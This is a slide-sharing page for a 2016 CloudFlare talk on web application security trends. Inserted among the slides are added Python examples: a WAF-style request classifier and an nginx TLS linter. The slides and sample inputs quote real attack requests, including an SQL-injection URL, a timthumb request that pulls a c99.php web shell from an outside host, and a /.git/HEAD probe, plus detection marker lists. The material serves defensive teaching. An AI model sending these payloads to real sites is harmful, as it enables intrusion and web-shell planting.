
Latest Trends in Web Application Security

18,668 views

Published on

Hear the talk on YouTube: https://www.youtube.com/watch?v=lp4dQTSH130

Web Application Firewall security is evolving. Join John Graham-Cumming, CTO of CloudFlare, as he shares the latest trends and changes in web application security. The talk details the big trends in web application security seen in 2015, how to defend against these threats, and how the web application security landscape is evolving.

Published in: Technology

Latest Trends in Web Application Security

  1. Web Application Security. John Graham-Cumming | Chief Technology Officer, CloudFlare. March 2016
  2. Agenda
     • Layered Web Application Security
     • 2015 Top Web Application Attack Techniques
     • Kitchen Sink Attacks
     • TLS
  3. Introduction
  4. Our mission: Help build a better Internet
  5. Running applications on the Internet is challenging (Standards/Platform, Availability, Security, Performance)
     “Hundreds of dollars a month for private hosting and it was still reliably crashing on or around decision day.”
     “We're seeing some customers that are connecting to ixl.com via IPv6, which we are not equipped to handle.”
     “The first flood of attack traffic was mitigated with some blocking techniques implemented by our CDN, but when the attack got more creative there was nothing more they could do.”
     “Because our servers were only located in the U.S. at that time, some of our customers from other parts of the world were experiencing slower loading of the widget.”
  6. We solve the challenges of the Internet
     Standards/Platform: • Analytics • IPv6 gateway • DNSSEC • Google SPDY + HTTP2 • Apps platform
     Availability: • Load balancing • Always online • Redundant, Anycast network
     Security: • Reputation-based security • Distributed denial of service (DDoS) mitigation • Firewall • Secure socket layer (SSL) • Malware detection
     Performance: • Content delivery (CDN) • Authoritative DNS • Web content optimization (WCO) • Front-end / mobile optimization • Railgun™ WAN optimizer
  7. [image-only slide]
  8. Layered Web Application Security
  9. What attackers attack
     • Web applications themselves
       • e.g. attempted SQL injection
       • e.g. DoS by hitting a CPU-expensive URI
     • Web servers
       • Attempted access to files on machines
       • SYN flooding to overwhelm TCP buffers
     • Related infrastructure
       • Authoritative DNS for a domain / DNS poisoning
       • Domain registration
  10. Layered Defense
     • Secure coding practices
     • Web Application Firewall
       • Can protect against application-level attacks
       • Use one that can be customized for your application
     • DoS mitigation service
     • DNS service that has withstood large DoS attacks
     • DNSSEC
     • A domain registrar with robust security policies to prevent transfer
  11. Buying Time
     • A WAF buys time to patch vulnerabilities
     • Common to see vulnerabilities announced along with patches
     • But how long does it take to patch?
  12. Examples
     • December 14, 2015: CVE-2015-8562, Joomla CMS Unserialize Vulnerability (released without a patch)
     • April 25, 2015: SUPEE-5344, Magento RCE Vulnerability
     • April 15, 2015: CVE-2015-1635, Windows Server RCE Vulnerability
  13. 2015 Top Web Application Attack Techniques
  14. OWASP Top 10 in 2015
     1. A5 Security Misconfiguration
     2. A9 Using Components with Known Vulnerabilities
     3. A6 Sensitive Data Exposure
     4. A4 Insecure Direct Object References
     5. A1 Injection
     6. A3 XSS
     7. A7 Missing Function Level Access Control
     8. A8 Cross Site Request Forgery
     9. A10 Unvalidated Redirects and Forwards
     10. A2 Weak authentication and session management
  15. Common Web DoS Vectors
     • Requests without a user agent
       • Drop requests that have no User-Agent field
     • WordPress pingback attacks
       • Drop WordPress pingbacks
     • Fake user agent
       • Validate User-Agent to identify real browsers
  16. Common Web DoS Vectors
     • Faulty data sanitization
       /skin/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%232.
     • Exploitation of timthumb for RCE
       GET /wp-content/themes/thumb.php?src=http://dsf2kh34as.co/c99.php
  17. Common Web DoS Vectors
     • Incorrect SCM data access
       GET /.git/HEAD HTTP/1.1
       User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
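Slides 15 to 17 list request-level signals a WAF or edge filter can act on: a missing User-Agent, WordPress pingback traffic, user agents that do not look like a browser, SQL-injection patterns in the query string, remote URLs passed as parameters (the timthumb case), and requests for source-control directories such as /.git/. The classifier below is an added example written for this page; it is not CloudFlare's code or any product's rule set. It parses raw HTTP request text and tags each request with the vectors it matches, run over a handful of constructed sample requests (the two request lines from slides 16 and 17 are reused as inputs). The browser check is a format heuristic only, and the SQL-injection marker list is an assumption chosen for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample requests, one per vector on the slides (plus one benign request).
SAMPLE_REQUESTS = [
    # benign browser request
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/44.0\r\n\r\n",
    # slide 15: no User-Agent header at all
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n",
    # slide 15: WordPress pingback verification traffic
    "GET / HTTP/1.1\r\nHost: example.com\r\n"
    "User-Agent: WordPress/4.4; http://blog.example; verifying pingback from 203.0.113.9\r\n\r\n",
    # slide 16: error-based SQL injection attempt sent by a non-browser client
    "GET /skin/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20"
    "(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),"
    "floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1\r\n"
    "Host: example.com\r\nUser-Agent: python-requests/2.9.1\r\n\r\n",
    # slide 16: remote URL handed to timthumb's src parameter
    "GET /wp-content/themes/thumb.php?src=http://dsf2kh34as.co/c99.php HTTP/1.1\r\n"
    "Host: example.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/44.0\r\n\r\n",
    # slide 17: source-control metadata fetch with a browser-looking User-Agent
    "GET /.git/HEAD HTTP/1.1\r\nHost: example.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)\r\n\r\n",
]

# Assumed marker substrings for SQL-injection probing (matched on the URL-decoded, lower-cased query).
SQLI_MARKERS = ("information_schema", "concat(", "rand(", "union select", "select count(*)")
# Directories that belong to a source-control checkout and should never be served.
SCM_DIRS = {".git", ".svn", ".hg", ".bzr"}
# Heuristic shape of a real browser User-Agent: "Mozilla/x.y (" + platform comment.
BROWSER_UA = re.compile(r"^Mozilla/\d\.\d \(.+\)")


def parse_request(raw):
    """Parse the request line and headers of a raw HTTP/1.x request (body ignored)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def classify(req):
    """Return the list of vector tags a parsed request matches (empty list = nothing seen)."""
    tags = []
    ua = req["headers"].get("user-agent")
    if ua is None or not ua.strip():
        tags.append("no-user-agent")
    elif ua.startswith("WordPress/") or "verifying pingback" in ua.lower():
        tags.append("wordpress-pingback")
    elif not BROWSER_UA.match(ua):
        tags.append("non-browser-user-agent")  # heuristic only; a JS challenge is the stronger check

    parts = urlsplit(req["target"])
    path_segments = [seg.lower() for seg in parts.path.split("/") if seg]
    if any(seg in SCM_DIRS for seg in path_segments):
        tags.append("scm-path")

    decoded_query = unquote(parts.query).lower()
    if any(marker in decoded_query for marker in SQLI_MARKERS):
        tags.append("sqli-pattern")

    # A parameter whose value is itself an http(s) URL is the remote-include shape from slide 16.
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        if re.match(r"^https?://", value, re.IGNORECASE):
            tags.append("remote-url-parameter")
            break
    return tags


def classify_raw(raw):
    """Convenience wrapper: tags for one raw request string."""
    return classify(parse_request(raw))


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        req = parse_request(raw)
        print(f"{req['method']} {req['target'][:60]:<60} -> {classify(req) or ['ok']}")
```

Note that the /.git/HEAD request carries a perfectly plausible browser User-Agent, so User-Agent validation alone would pass it; the path check is what catches it, which is the layering argument of slide 10 in miniature.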
  18. Kitchen Sink Attacks
  19. Everything they’ve got
     • Common to see attackers try multiple vectors to bring down a web site
       1. Simultaneous SYN flood, DNS reflection attack, and authoritative DNS attack
       2. Using multiple layer 7 (HTTP/HTTPS) botnets at the same time
       3. 1 and 2
  20. Typical DoS volume at CloudFlare [chart]
  21. Recent 400 Gbps DoS attacks [chart]
  22. TLS
  23. [image-only slide]
  24. DROWN, March 1 2016
  25. CloudFlare’s TLS Configuration
     • Public and on GitHub: https://github.com/cloudflare/sslconfig
       ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
       ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20-draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;
       ssl_prefer_server_ciphers on;
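Slide 24 names DROWN, the March 2016 attack against servers that still offer SSLv2, and slide 25 shows the nginx directives CloudFlare publishes: only TLS 1.0 to 1.2 are offered, the cipher string excludes MD5, and the server's preference order wins. "Stay on top of TLS" (slide 27) is easier with an automated check. The linter below is an added example for this page, not CloudFlare's tooling; it parses the `ssl_protocols`, `ssl_ciphers` and `ssl_prefer_server_ciphers` directives out of nginx configuration text and reports legacy protocol versions and weak cipher tokens that are selected rather than excluded. The weak-token list and the finding strings are assumptions chosen for illustration; the weak configuration is constructed, and the hardened one is the slide's own.

```python
import re

# Protocol versions that should not be offered and the attack each is associated with.
LEGACY_PROTOCOLS = {"SSLv2": "DROWN", "SSLv3": "POODLE"}
# OpenSSL cipher-string tokens that should only ever appear negated ("!MD5").
WEAK_CIPHER_TOKENS = {"MD5", "RC4", "DES", "EXPORT", "NULL", "aNULL", "eNULL", "LOW"}

# Constructed: a legacy configuration that still offers SSLv2/SSLv3 and selects RC4 and MD5 suites.
WEAK_CONFIG = """
ssl_protocols SSLv2 SSLv3 TLSv1;
ssl_ciphers ALL:RC4+RSA:MD5:!aNULL;
ssl_prefer_server_ciphers off;
"""

# The configuration shown on slide 25 (github.com/cloudflare/sslconfig).
CLOUDFLARE_CONFIG = """
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20-draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;
ssl_prefer_server_ciphers on;
"""


def parse_ssl_directives(config_text):
    """Map each ssl_* directive name to its whitespace-split arguments (last occurrence wins)."""
    directives = {}
    for match in re.finditer(r"^\s*(ssl_\w+)\s+([^;]+);", config_text, re.MULTILINE):
        directives[match.group(1)] = match.group(2).split()
    return directives


def cipher_tokens(cipher_string):
    """Split an OpenSSL cipher string into its atomic tokens ("EECDH+AES128" -> EECDH, AES128)."""
    return [tok for tok in re.split(r"[:+]", cipher_string) if tok]


def lint_tls_config(config_text):
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    findings = []
    directives = parse_ssl_directives(config_text)

    protocols = directives.get("ssl_protocols", [])
    if not protocols:
        findings.append("ssl_protocols is not set explicitly")
    for proto in protocols:
        if proto in LEGACY_PROTOCOLS:
            findings.append(f"ssl_protocols offers {proto} ({LEGACY_PROTOCOLS[proto]})")

    ciphers = directives.get("ssl_ciphers", [])
    if not ciphers:
        findings.append("ssl_ciphers is not set explicitly")
    for tok in cipher_tokens(" ".join(ciphers)):
        # A leading "!" removes the suites from the list, which is the desired form.
        if not tok.startswith("!") and tok in WEAK_CIPHER_TOKENS:
            findings.append(f"ssl_ciphers includes weak token {tok}")

    if directives.get("ssl_prefer_server_ciphers", ["off"]) != ["on"]:
        findings.append("ssl_prefer_server_ciphers is not on")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("slide 25", CLOUDFLARE_CONFIG)):
        print(f"[{label}] {lint_tls_config(cfg) or 'no findings'}")
```

Running the linter as a pre-deploy step turns the slide's advice into a gate: a change that re-enables SSLv2 or adds an RC4 suite fails before it reaches the edge. Note that 3DES is deliberately not on the weak list here because the slide's configuration keeps it for older clients.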
  26. Conclusion
  27. Conclusion
     • Layered Defense
     • Patch, but use a WAF to buy time
     • Stay on top of TLS
